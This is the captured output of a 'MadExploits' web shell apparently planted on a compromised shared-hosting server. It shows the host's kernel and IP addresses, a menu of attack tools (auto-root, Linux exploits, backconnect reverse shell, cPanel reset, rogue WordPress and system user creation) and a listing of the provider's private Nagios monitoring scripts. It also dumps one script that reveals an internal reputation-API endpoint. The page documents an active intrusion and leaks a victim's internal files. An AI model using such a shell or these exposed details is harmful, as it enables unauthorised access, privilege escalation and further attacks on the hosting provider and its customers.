Linux server60.web-hosting.com 4.18.0-513.24.1.lve.1.el8.x86_64 #1 SMP Thu May 9 15:10:09 UTC 2024 x86_64
LiteSpeed
: 198.54.116.118 | : 18.218.8.152
Cant Read [ /etc/named.conf ]
8.1.29
eterygua
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib64 /
nagios /
plugins /
nccustom /
[ HOME SHELL ]
Name
Size
Permission
Action
authorized_users.list
143
B
-rw-r-----
check-autobackup.sh
6.68
KB
-rwxr-xr-x
check-cagefs-status.sh
2.04
KB
-rwxr-xr-x
check-cpanel-update.sh
1.85
KB
-rwxr-xr-x
check-litespeed-version.sh
2.87
KB
-rwxr-xr-x
check-lscache-version.sh
3.84
KB
-rwxr-xr-x
check-mail-filter-avlb.sh
2.18
KB
-rwxr-xr-x
check-outmailip-rbl.py
3.99
KB
-rwxr-xr-x
check-rpmdb-integrity.sh
1.16
KB
-rwxr-xr-x
check-unexpected-systemd-servi...
8.07
KB
-rwxr-xr-x
check_backup.sh
6.35
KB
-rwxr-xr-x
check_cl_license
950
B
-rwxr-xr-x
check_cplicense.sh
268
B
-rwxr-xr-x
check_cpshell
949
B
-rwxr-xr-x
check_csf
3.72
KB
-rwxr-xr-x
check_cwaf.sh
2.44
KB
-rwxr-xr-x
check_eximq.sh
3.16
KB
-rwxr-xr-x
check_extra_accts.py
4.18
KB
-rwxr-xr-x
check_http_full_stack.conf
144
B
-rw-r--r--
check_http_full_stack.py
4.3
KB
-rwxr-xr-x
check_if_ips.py
4.15
KB
-rwxr-xr-x
check_if_ips_tcp.py
4.71
KB
-rwxr-xr-x
check_ip_update_log.sh
540
B
-rwxr-xr-x
check_ip_usage.py
6.63
KB
-rwxr-xr-x
check_kernelcare.sh
2.13
KB
-rwxr-xr-x
check_lfd_logs.conf
471
B
-rw-r--r--
check_logfiles.conf
595
B
-rw-r--r--
check_logfiles.pl
206.82
KB
-rwxr-xr-x
check_logfiles_innodbcounter.c...
1002
B
-rw-r--r--
check_mailip.py
3.83
KB
-rwxr-xr-x
check_mem.pl
12.85
KB
-rwxr-xr-x
check_mysqld_msize.sh
666
B
-rwxr-xr-x
check_nc_cp_backup_process.sh
8.75
KB
-rwxr-xr-x
check_ncsslplugin.py
1.89
KB
-rwxr-xr-x
check_ntp_client
11.78
KB
-rwxr-xr-x
check_openport.sh
7.59
KB
-rwxr-xr-x
check_pem_worker.pl
929
B
-rwxr-xr-x
check_pgactivity
294.21
KB
-rwxr-xr-x
check_plans.py
7.59
KB
-rwxr-xr-x
check_postfix_queue.sh
5.75
KB
-rwxr-xr-x
check_puppet
16.14
KB
-rwxr-xr-x
check_quota_on.sh
902
B
-rwxr-xr-x
check_ro_fs.py
2.83
KB
-rwxr-xr-x
check_service.sh
9.34
KB
-rwxr-xr-x
check_software_updates
31.68
KB
-rwxr-xr-x
check_spamd
6.7
KB
-rwxr-xr-x
check_stalled_procs.py
4.42
KB
-rwxr-xr-x
check_unauthorized_user.sh
17.16
KB
-rwxr-xr-x
replcheck_param.pl
5.48
KB
-rwxr-xr-x
systemd_scopes_whitelist
10
B
-rw-r--r--
systemd_services_folders
70
B
-rw-r--r--
systemd_services_whitelist
6.67
KB
-rw-r--r--
systemd_targets_whitelist
12
B
-rw-r--r--
test.eml
3.26
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : check-outmailip-rbl.py
#!/usr/libexec/platform-python # -*- coding: utf-8 -*- #from __future__ import print_function import os, sys import requests, json, urllib3 from os import R_OK from os.path import isfile def check_ncbl_via_api(warning, critical, tkn, urlpath): ips = [] IpsFileName = os.path.join(os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(sys.argv[0]))), '/etc/outgoingmailip') if not (isfile(IpsFileName) and os.access(IpsFileName, R_OK)): print("IPs file doesn't exist or isn't readable: " + IpsFileName) exit(3) try: if os.path.getsize(IpsFileName) > 0: with open(IpsFileName, 'r') as fin: ips = fin.read().splitlines() else: print("IPs file is empty") exit(3) except OSError as e: print("Error reading IPs file: %s" % e) exit(3) res = [] check_summ = [] infoCR = {} infoWA = {} import requests, json, urllib3 hdrs = {"accept": "application/json", "Authorization": "Token " + tkn} for ip in ips: url = urlpath + str(ip).rstrip() try: r = requests.get(url, headers=hdrs, allow_redirects=False, timeout=2) if r.status_code == 200: resp = r.json() if resp['total_score'] > 0: feeds = {} weight = [] for item in resp['ip_reputation']: if not item['source']['source_name'].encode('ascii','ignore') in feeds: feeds[item['source']['source_name'].encode('ascii','ignore')] = item['source']['weight'] else: feeds.update({item['source']['source_name'].encode('ascii','ignore'): feeds[item['source']['source_name'].encode('ascii','ignore')] + item['source']['weight']}) weight.append(item['source']['weight']) res.append("IP {0}: {1}.".format(str(ip.rstrip()), feeds)) check_summ.append(sum(weight)) if sum(weight) >= critical: infoCR["IP: " + str(ip.rstrip()) + ", CRIT"] = sum(weight) else: infoWA["IP: " + str(ip.rstrip()) + ", WARN"] = sum(weight) else: print("Request to ASP API not OK. Status code: " + str(r.status_code)) print(r.text) exit(3) except requests.ConnectionError as e: print("Connection failed to: " + url + " \n" + str(e)) exit(2) if res: if critical > max(check_summ) >= warning: for key, value in sorted(infoWA.items(), key=lambda item: item[1], reverse=True): print("%s: %s. " % (key, value), end="") print(" (via API)") print("\n".join(res)) raise exit(1) elif max(check_summ) >= critical: for key, value in sorted(infoCR.items(), key=lambda item: item[1], reverse=True): print("%s: %s. " % (key, value), end="") print(" (via API)") print("\n".join(res)) raise exit(2) else: print("OK (SpamScore only " + str(max(check_summ)) + " via API)") raise exit(0) else: print("OK (via API)") raise exit(0) if __name__ == '__main__': import argparse parser = argparse.ArgumentParser(description='Outgoing mail IP reputation status') parser.add_argument("-w", "--warning", type=int, default=49, help="Default is 49.") parser.add_argument("-c", "--critical", type=int, default=50, help="Default is 50.") parser.add_argument("-n", "--token", type=str, default="XXX", help="Auth ASP API token") parser.add_argument("-p", "--urlpath", type=str, default="https://phx01ext-ncbl02.et.namecheap.tech:59443/ncbl/v1/ip_reputation/", help="URL path for APS API") args = parser.parse_args() check_ncbl_via_api(args.warning, args.critical, args.token, args.urlpath)
Close